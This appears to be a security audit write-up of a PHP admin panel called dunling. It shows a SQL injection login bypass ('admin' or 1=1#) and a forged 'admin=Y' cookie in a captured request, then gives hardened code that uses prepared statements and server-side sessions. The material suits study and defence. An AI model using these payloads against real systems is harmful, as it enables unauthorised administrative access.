Capture the login request with Burp and test the parameters with a single quote.
login.php
The POST parameters are not filtered, so the login form is vulnerable to SQL injection. Log in with a "universal password" payload as the username:
admin' or 1=1#
The username is concatenated straight into the query, which becomes `select * from xwmi_admin where adminname='admin' or 1=1#' and adminpass='...'`; `#` starts a MySQL line comment, so the password condition is discarded. One caveat from the code: login.php only treats the login as successful when `mysql_num_rows` returns exactly 1, so `or 1=1` works only while the table holds a single row. Against a table with several admin rows a payload that selects just one user, such as `admin'#`, is needed.
```php
<?php
require '../config.php';

// Raw POST values go straight into the SQL string: no escaping, no prepared statement.
$adminname = $_POST['adminname'];
$adminpass = $_POST['adminpass'];
$adminsql  = "select * from xwmi_admin where adminname='$adminname' and adminpass='$adminpass'";
$adminery  = mysql_query($adminsql, $config);
$adminnum  = mysql_num_rows($adminery);

// Success is decided purely by the row count being exactly 1.
if ($adminnum == "1") {
    // The "logged in" state is a client-side cookie flag, not a server-side session.
    setcookie("admin", "Y", time() + 3600*24, '/');
    setcookie("admin_name", $adminname, time() + 3600*24, '/');
    header("location:admin.php");
} else {
    header("location:index.php");
}
?>
```
Requesting the backend directly without the cookie is redirected (==>) to the front page:
http://192.168.5.8/dunling/admin/admin.php ==> http://192.168.5.8/dunling/index.php
admin.php
```php
<?php
require 'check.php';
require '../template/axadmin/head.php';
require '../template/axadmin/banner.php';
require '../template/axadmin/admin.php';
require '../template/axadmin/bottom.php';
?>
```
check.php
The only check is whether the `admin` cookie equals the literal `Y`; it grants backend access on that alone, with no server-side session or user verification. The `admin_name` cookie is read but never validated.
```php
<?php
error_reporting(0);

// Both values come straight from client-controlled cookies.
isset($_COOKIE['admin']) ? $check = $_COOKIE['admin'] : $check = null;
isset($_COOKIE['admin_name']) ? $admin_user = $_COOKIE['admin_name'] : $user = null;

// A cookie of admin=Y passes; nothing ties it to a real login.
if ($check != "Y") {
    header("Location:../index.php");
    exit;
}
?>
```
Captured request:
```http
GET /dunling/admin/admin.php HTTP/1.1
Host: 192.168.5.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 FS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: admin=Y; admin_name=ajie
Connection: close
```
Adding `admin=Y` (plus any `admin_name`) to the Cookie header is enough to reach the backend directly; no password is ever required.
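Both findings (the string-built query in login.php and the cookie-only gate in check.php) have the same fix: never let user input reach the SQL text, and keep the "logged in" state on the server. The following is an added example of hardened versions of both files, not code from the dunling project. It assumes `../config.php` exposes `$config` as a `mysqli` connection with mysqlnd available (for `get_result()`), and that `xwmi_admin.adminpass` has been migrated to `password_hash()` output; both are assumptions.

```php
<?php
// login.php (hardened example, not the project's code).
// Assumption: $config from ../config.php is a mysqli connection (mysqlnd enabled).
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();
require '../config.php';

$adminname = $_POST['adminname'] ?? '';
$adminpass = $_POST['adminpass'] ?? '';

// Parameterised query: the username is bound as data, so a payload such as
// admin' or 1=1# is looked up as a literal username and matches nothing.
$stmt = $config->prepare(
    'SELECT adminname, adminpass FROM xwmi_admin WHERE adminname = ? LIMIT 1'
);
$stmt->bind_param('s', $adminname);
$stmt->execute();
$row = $stmt->get_result()->fetch_assoc();
$stmt->close();

// Assumption: adminpass column stores password_hash() output, so the password
// is verified against a hash rather than compared inside the SQL WHERE clause.
if ($row !== null && password_verify($adminpass, $row['adminpass'])) {
    // Rotate the session id on privilege change (session fixation), then record
    // the login server-side instead of issuing an admin=Y cookie.
    session_regenerate_id(true);
    $_SESSION['admin_name'] = $row['adminname'];
    header('Location: admin.php');
} else {
    header('Location: index.php');
}
exit;
?>

<?php
// check.php (hardened example, not the project's code).
// Only the server-side session is trusted; a forged Cookie header cannot set it.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
session_start();

if (empty($_SESSION['admin_name'])) {
    header('Location: ../index.php');
    exit;
}

// Templates that previously read $admin_user from the cookie now get it from the session.
$admin_user = $_SESSION['admin_name'];
?>
```

With this in place the captured request above, carrying `Cookie: admin=Y; admin_name=ajie`, is redirected to index.php because no `PHPSESSID` maps to a session containing `admin_name`, and the `admin' or 1=1#` username returns zero rows from the prepared statement.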